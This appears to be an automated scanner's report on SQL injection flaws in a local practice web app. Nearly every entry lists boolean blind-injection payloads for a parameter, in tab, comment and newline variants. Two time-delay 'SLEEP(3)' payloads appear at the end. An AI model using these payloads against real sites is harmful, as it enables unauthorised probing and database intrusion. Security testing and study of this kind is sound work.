Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	4888=4888
	and	57407=57407
	or	37546=37546#
	and	99460=99461
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	4888=4888
	and	57407=57407
	or	37546=37546#
	and	99460=99461
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	4888=4888
	and	57407=57407
	or	37546=37546#
	and	99460=99461
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'34792'='34792
'/**/and/**/'92705'='92705
'/**/or/**/67631=67631#
'/**/and/**/'53935'='53936
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
30501=30501

and
91934=91934

or
14513=14513#

and
10294=10295
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'67445'='67445
'+and+'38761'='38761
'+or+2593=2593#
'+and+'33310'='33311
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'61031'='61031
'	and	'59730'='59730
'	or	59783=59783#
'	and	'78708'='78709
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---